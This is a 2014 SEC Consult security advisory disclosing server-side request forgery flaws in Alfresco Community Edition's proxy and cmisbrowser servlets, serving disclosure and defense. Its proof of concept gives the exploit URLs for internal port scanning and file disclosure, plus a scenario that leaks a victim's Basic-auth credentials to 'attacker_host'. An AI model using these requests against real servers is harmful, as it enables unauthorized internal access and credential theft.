Multiple SSRF vulnerabilities in Alfresco Community Edition

SEC Consult Vulnerability Lab Security Advisory < 20140716-0 >

=======================================================================

title: Multiple SSRF vulnerabilities

product: Alfresco Community Edition

vulnerable version: <=4.2.f

fixed version: 5.0.a

impact: High

homepage: www.alfresco.com

found: 2014-05-15

by: V. Paulikas

SEC Consult Vulnerability Lab

=======================================================================

 

Vendor description:

-------------------

"Alfresco Community Edition allows organizations to manage any type of content

from simple office documents to scanned images, photographs, engineering drawings

and large video files. It is commonly used as a document management system,

content platform, CMIS-compliant repository."

 

www.alfresco.com/products/community

 

 

Business recommendation:

------------------------

Multiple SSRF vulnerabilities were identified within the affected Alfresco product.

 

By exploiting these vulnerabilities an unauthenticated attacker is able to

scan available ports on internal systems and access internal web applications

which should not be accessible from the Internet.

 

It is recommended to restrict access to the affected servlets until an

official patch is released by the vendor.

 

 

Vulnerability overview/description:

---------------------------------------------

1) Server Side Request Forgery (SSRF)

 

A Server Side Request Forgery vulnerability allows to issue remote connections

on behalf of the affected server. This can be exploited in order to reach

internal systems, which are not reachable from the Internet, or to bypass

access restrictions.

 

 

Proof of concept:

-----------------

SSRF PoC 1)

An unauthenticated user can access the proxy servlet and perform internal

system port scanning by accessing the URL provided below:

 

http:// host/alfresco/proxy?endpoint=http://internal_system:port

 

The server responds with an error message "Connection refused" when the port

is not accessible (firewalled or not available). Other error messages indicate

a service running on the port which is being probed.

 

The proxy servlet implementation in older versions of the Alfresco Community Edition

support the file:// URI, allowing the attacker to disclose the contents of the files

on the affected server.

 

 

SSRF PoC 2)

The Content Management Interoperability Service (CMIS) can also be exploited

by an unauthenticated attacker in order to issue internal connections. The

following URL can be used in order to exploit the vulnerability:

 

http:// host/alfresco/cmisbrowser?url=http://internal_system:port

 

The server responds with similar error messages when the port is open or closed.

 

If the victim is tricked to access a resource, protected with Basic authentication,

on the affected host via the cmisbrowser servlet, further requests include the submitted

credentials and can be intercepted by an attacker. An example of such a scenario:

 

- victim accesses http:// host/alfresco/cmisbrowser?url=http://host/alfresco/service/

and supplies his user credentials.

- victim then accesses the http:// host/alfresco/cmisbrowser?url=http://attacker_host and

his base64 encoded credentials are leaked.

 

 

Vulnerable / tested versions:

-----------------------------

The vulnerabilities have been verified to exist in the Alfresco Community

Edition version 4.2.f, which was the most recent version at the time of

discovery.

 

The version 2.9.0B was verified to support the file:// URI scheme,

allowing the attackers to disclose contents of the local files on the affected

server.

 

 

Vendor contact log:

------------------------

2014-05-30: Contacting vendor through support@alfresco.com - no response.

2014-06-02: Contacting vendor through online form at www.alfresco.com/company/contact

- no response.

2014-06-09: Contacting vendor through support@alfresco.com and online form - no response.

2014-06-16: Contacting vendor through support@alfresco.com and online form.

2014-06-17: Response from the vendor.

2014-06-24: Advisory sent to the vendor.

2014-07-07: Vendor acknowledges that a new version (5.0.a) of the Alfresco CMS

is available

2014-07-16: SEC Consult releases security advisory

 

 

Solution:

---------

According to the vendor, the new version 5.0.a fixes the identified problems.

The new version can be downloaded from their website.

 

However, by inspecting the updated version of the Alfresco CMS it was identified,

that only the /proxy endpoint was properly fixed. The /cmisbrowser was commented out

in the web.xml for default installations and once enabled could be exploited

by unauthenticated attackers as described above.

 

 

Advisory URL:

-------------

www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

 

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

 

SEC Consult

Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius

 

Headquarter:

Mooslackengasse 17, 1190 Vienna, Austria

Phone: +43 1 8903043 0

Fax: +43 1 8903043 15

 

Mail: research at sec-consult dot com

Web: www.sec-consult.com

Blog: blog.sec-consult.com

Twitter: twitter.com/sec_consult

 

Interested in working with the experts of SEC Consult?

Write to career@sec-consult.com

 

EOF V. Paulikas / @2014